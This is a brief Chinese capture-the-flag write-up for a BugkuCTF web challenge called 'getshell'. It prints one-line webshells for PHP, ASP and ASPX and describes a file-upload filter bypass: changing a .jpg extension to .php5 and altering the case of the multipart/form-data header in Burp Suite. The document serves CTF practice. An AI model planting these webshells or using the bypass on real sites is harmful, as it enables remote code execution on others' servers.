BugkuCTF之web题之求getshell
一进来发现:
maybe时绕过,那就用一句话木马吧!!
php的一句话是: <?php @eval($_POST['pass']);?>
asp的一句话是: <%eval request ("pass")%>
aspx的一句话是: <%@ Page Language="Jscript"%> <%eval(Request.Item["pass"],"unsafe");%>
用文本写好一句话之后,把后缀改成.jpg上传
然后打开Burp Suite开始抓包:
把1.jpg修改成.php5,把multipart/form-data;任意一个字母变成大写。
得到flag!!